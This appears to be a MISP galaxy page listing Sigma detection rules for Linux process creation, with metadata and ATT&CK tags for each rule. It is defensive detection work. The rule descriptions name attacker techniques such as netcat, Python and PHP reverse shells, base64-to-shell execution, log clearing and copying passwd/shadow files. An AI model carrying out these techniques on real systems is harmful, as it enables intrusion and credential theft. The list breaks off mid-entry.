UUID b86d356d-6093-443d-971c-9b07db583c68 which can be used as unique global reference for Suspicious Curl Change User Agents - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_lnx_susp_curl_useragent.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Potential Python Reverse Shell

Detects executing python with keywords related to network activity that could indicate a potential reverse shell

Internal MISP references

UUID 32e62bc7-3de0-4bb1-90af-532978fe42c0 which can be used as unique global reference for Potential Python Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/24
falsepositive ['Unknown']
filename proc_creation_lnx_python_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

Internal MISP references

UUID 818f7b24-0fba-4c49-a073-8b755573b9c7 which can be used as unique global reference for Linux Webshell Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/10/15
falsepositive ['Web applications that invoke Linux command line tools']
filename proc_creation_lnx_webshell_detection.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

Internal MISP references

UUID d2d642d7-b393-43fe-bae4-e81ed5915c4b which can be used as unique global reference for Scheduled Task/Job At in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_at_command.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Print History File Contents

Detects events in which someone prints the contents of history files to the command line or redirects them to a file for reconnaissance

Internal MISP references

UUID d7821ff1-4527-4e33-9f84-d0d57fa2fb66 which can be used as unique global reference for Print History File Contents in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_history_recon.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004']
Related clusters

To see the related clusters, click here.

Crontab Enumeration

Detects usage of crontab to list the tasks of the user

Internal MISP references

UUID 403ed92c-b7ec-4edd-9947-5b535ee12d46 which can be used as unique global reference for Crontab Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate use of crontab']
filename proc_creation_lnx_crontab_enumeration.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1007']
Related clusters

To see the related clusters, click here.

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

Internal MISP references

UUID f8341cb2-ee25-43fa-a975-d8a5a9714b39 which can be used as unique global reference for BPFtrace Unsafe Option Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2022/02/11
falsepositive ['Legitimate usage of the unsafe option']
filename proc_creation_lnx_bpftrace_unsafe_option_usage.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Potential PHP Reverse Shell

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.

Internal MISP references

UUID c6714a24-d7d5-4283-a36b-3ffd091d5f7e which can be used as unique global reference for Potential PHP Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_php_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

OMIGOD SCX RunAsProvider ExecuteScript

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temporary file in the /tmp folder with an scx prefix. It is then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file carries the same scx prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate use of SCX RunAsProvider ExecuteScript.']
filename proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

Internal MISP references

UUID ba592c6d-6888-43c3-b8c6-689b8fe47337 which can be used as unique global reference for Linux Base64 Encoded Pipe to Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/26
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_base64_execution.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Clear Linux Logs

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

Internal MISP references

UUID 80915f59-9b56-4616-9de0-fd0dea6c12fe which can be used as unique global reference for Clear Linux Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_clear_logs.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.002']
Related clusters

To see the related clusters, click here.

Group Has Been Deleted Via Groupdel

Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

Internal MISP references

UUID 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 which can be used as unique global reference for Group Has Been Deleted Via Groupdel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2022/12/26
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_groupdel.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

Internal MISP references

UUID fe2f9663-41cb-47e2-b954-8a228f3b9dff which can be used as unique global reference for Linux Base64 Encoded Shebang In CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_base64_shebang_cli.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Capabilities Discovery - Linux

Detects usage of the "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or otherwise.

Internal MISP references

UUID d8d97d51-122d-4cdd-9e2f-01b4b4933530 which can be used as unique global reference for Capabilities Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_capa_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

Internal MISP references

UUID 880973f3-9708-491c-a77b-2a35a1921158 which can be used as unique global reference for Linux Shell Pipe to Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/14
falsepositive ['Legitimate software that uses these patterns']
filename proc_creation_lnx_susp_pipe_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Curl Usage on Linux

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

Internal MISP references

UUID ea34fb97-e2c4-4afb-810f-785e4459b194 which can be used as unique global reference for Curl Usage on Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_lnx_curl_usage.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

ESXi System Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.

Internal MISP references

UUID e80273e1-9faf-40bc-bd85-dbaff104c4e9 which can be used as unique global reference for ESXi System Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_system_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

Internal MISP references

UUID 4cad6c64-d6df-42d6-8dae-eb78defdc415 which can be used as unique global reference for Potential Linux Process Code Injection Via DD Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseph Kamau
creation_date 2023/12/01
falsepositive ['Unknown']
filename proc_creation_lnx_dd_process_injection.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1055.009']
Related clusters

To see the related clusters, click here.

Touch Suspicious Service File

Detects usage of the "touch" utility on a service file.

Internal MISP references

UUID 31545105-3444-4584-bebf-c466353230d2 which can be used as unique global reference for Touch Suspicious Service File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/11
falsepositive ['Admin changing date of files.']
filename proc_creation_lnx_touch_susp.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

ESXi Syslog Configuration Change Via ESXCLI

Detects changes to the ESXi syslog configuration via "esxcli"

Internal MISP references

UUID 38eb1dbb-011f-40b1-a126-cf03a0210563 which can be used as unique global reference for ESXi Syslog Configuration Change Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administrative activities']
filename proc_creation_lnx_esxcli_syslog_config_change.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1562.003']
Related clusters

To see the related clusters, click here.

Bash Interactive Shell

Detects execution of the bash shell with the interactive flag "-i".

Internal MISP references

UUID 6104e693-a7d6-4891-86cb-49a258523559 which can be used as unique global reference for Bash Interactive Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_bash_interactive_shell.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Copy Passwd Or Shadow From TMP Path

Detects when the file "passwd" or "shadow" is copied from tmp path

Internal MISP references

UUID fa4aaed5-4fe0-498d-bbc0-08e3346387ba which can be used as unique global reference for Copy Passwd Or Shadow From TMP Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_lnx_cp_passwd_or_shadow_tmp.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Disable Or Stop Services

Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services

Internal MISP references

UUID de25eeb8-3655-4643-ac3a-b662d3f26b6b which can be used as unique global reference for Disable Or Stop Services in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_services_stop_and_disable.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion']

ESXi VM List Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

Internal MISP references

UUID 5f1573a7-363b-4114-9208-ad7a61de46eb which can be used as unique global reference for ESXi VM List Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vm_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Commands to Clear or Remove the Syslog

Detects specific commands commonly used to remove or empty the syslog, which is often used by attackers as a method to hide their tracks

Internal MISP references

UUID 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 which can be used as unique global reference for Commands to Clear or Remove the Syslog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Log rotation.']
filename proc_creation_lnx_clear_syslog.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.002']
Related clusters

To see the related clusters, click here.

ESXi Storage Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

Internal MISP references

UUID f41dada5-3f56-4232-8503-3fb7f9cf2d60 which can be used as unique global reference for ESXi Storage Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_storage_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

ESXi Network Configuration Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

Internal MISP references

UUID 33e814e0-1f00-4e43-9c34-31fb7ae2b174 which can be used as unique global reference for ESXi Network Configuration Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_network_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Suspicious Java Children Processes

Detects java process spawning suspicious children

Internal MISP references

UUID d292e0af-9a18-420c-9525-ec0ac3936892 which can be used as unique global reference for Suspicious Java Children Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_susp_java_children.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Container Discovery Via Inodes Listing

Detects listing of the inodes of the "/" directory to determine if we are running inside of a container.

Internal MISP references

UUID 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 which can be used as unique global reference for Potential Container Discovery Via Inodes Listing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_inod_listing.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Process Discovery

Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network

Internal MISP references

UUID 4e2f5868-08d4-413d-899f-dc2f1508627b which can be used as unique global reference for Process Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_process_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1057']
Related clusters

To see the related clusters, click here.

Remove Immutable File Attribute

Detects usage of the 'chattr' utility to remove immutable file attribute.

Internal MISP references

UUID 34979410-e4b5-4e5d-8cfb-389fdff05c12 which can be used as unique global reference for Remove Immutable File Attribute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Administrator interacting with immutable files (e.g. for instance backups).']
filename proc_creation_lnx_chattr_immutable_removal.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Potential Suspicious Change To Sensitive/Critical Files

Detects changes to sensitive and critical files. Monitors files that you don't expect to change without planning on a Linux system.

Internal MISP references

UUID 86157017-c2b1-4d4a-8c33-93b8e67e4af4 which can be used as unique global reference for Potential Suspicious Change To Sensitive/Critical Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_ (Wuerth-Phoenix)
creation_date 2023/05/30
falsepositive ['Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.']
filename proc_creation_lnx_susp_sensitive_file_access.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']

OMIGOD SCX RunAsProvider ExecuteShellCommand

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 21541900-27a9-4454-9c4c-3f0a4240344a which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteShellCommand in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.']
filename proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']

Potential Netcat Reverse Shell Execution

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

Internal MISP references

UUID 7f734ed0-4f47-46c0-837f-6ee62505abd9 which can be used as unique global reference for Potential Netcat Reverse Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/07
falsepositive ['Unlikely']
filename proc_creation_lnx_netcat_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']

Nohup Execution

Detects usage of nohup, which could be leveraged by an attacker to keep a process running or to break out of restricted environments.

Internal MISP references

UUID e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 which can be used as unique global reference for Nohup Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/06
falsepositive ['Administrators or installed processes that leverage nohup']
filename proc_creation_lnx_nohup.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']

Install Root Certificate

Detects installation of a new certificate on the system, which attackers may use to avoid warnings when connecting to controlled web servers or C2s.

Internal MISP references

UUID 78a80655-a51e-4669-bc6b-e9d206a462ee which can be used as unique global reference for Install Root Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/05
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_install_root_certificate.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1553.004']

Remove Scheduled Cron Task/Job

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible.

Internal MISP references

UUID c2e234de-03a3-41e1-b39a-1e56dc17ba67 which can be used as unique global reference for Remove Scheduled Cron Task/Job in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Unknown']
filename proc_creation_lnx_crontab_removal.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion']

Potentially Suspicious Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location.

Internal MISP references

UUID 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a which can be used as unique global reference for Potentially Suspicious Named Pipe Created Via Mkfifo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/16
falsepositive ['Unknown']
filename proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Connection Proxy

Detects the setting of a proxy configuration.

Internal MISP references

UUID 72f4ab3f-787d-495d-a55d-68c2ff46cf4c which can be used as unique global reference for Connection Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_proxy_connection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1090']

ESXi VSAN Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

Internal MISP references

UUID d54c2f06-aca9-4e2b-81c9-5317858f4b79 which can be used as unique global reference for ESXi VSAN Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vsan_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']

Docker Container Discovery Via Dockerenv Listing

Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery.

Internal MISP references

UUID 11701de9-d5a5-44aa-8238-84252f131895 which can be used as unique global reference for Docker Container Discovery Via Dockerenv Listing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_dockerenv_recon.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']

ESXi Account Creation Via ESXCLI

Detects user account creation on an ESXi system via esxcli.

Internal MISP references

UUID b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db which can be used as unique global reference for ESXi Account Creation Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/08/22
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_user_account_creation.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1136']

Enable BPF Kprobes Tracing

Detects a common command used to enable BPF kprobes tracing.

Internal MISP references

UUID 7692f583-bd30-4008-8615-75dab3f08a99 which can be used as unique global reference for Enable BPF Kprobes Tracing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/25
falsepositive ['Unknown']
filename proc_creation_lnx_bpf_kprob_tracing_enabled.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.defense_evasion']

File Deletion

Detects file deletion using the "rm", "shred" or "unlink" commands, which are often used by adversaries to delete files left behind by their intrusion activity.

Internal MISP references

UUID 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 which can be used as unique global reference for File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_file_deletion.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.004']

Potential Linux Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

Internal MISP references

UUID f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 which can be used as unique global reference for Potential Linux Amazon SSM Agent Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal
creation_date 2023/08/03
falsepositive ['Legitimate activity of system administrators']
filename proc_creation_lnx_ssm_agent_abuse.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.persistence', 'attack.t1219']

ESXi Admin Permission Assigned To Account Via ESXCLI

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

Internal MISP references

UUID 9691f58d-92c1-4416-8bf3-2edd753ec9cf which can be used as unique global reference for ESXi Admin Permission Assigned To Account Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_permission_change_admin.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Container Residence Discovery Via Proc Virtual FS

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem.

Internal MISP references

UUID 746c86fb-ccda-4816-8997-01386263acc4 which can be used as unique global reference for Container Residence Discovery Via Proc Virtual FS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_container_residence_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']

Mount Execution With Hidepid Parameter

Detects execution of the "mount" command with the "hidepid" parameter to make processes invisible to other users on the system.

Internal MISP references

UUID ec52985a-d024-41e3-8ff6-14169039a0b3 which can be used as unique global reference for Mount Execution With Hidepid Parameter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/12
falsepositive ['Unknown']
filename proc_creation_lnx_mount_hidepid.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.credential_access', 'attack.t1564']

Remote Access Tool - Team Viewer Session Started On Linux Host

Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.t1133']

Download File To Potentially Suspicious Directory Via Wget

Detects the use of wget to download content to a suspicious directory.

Internal MISP references

UUID cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 which can be used as unique global reference for Download File To Potentially Suspicious Directory Via Wget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_wget_download_suspicious_directory.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']

Linux Doas Tool Execution

Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.

Internal MISP references

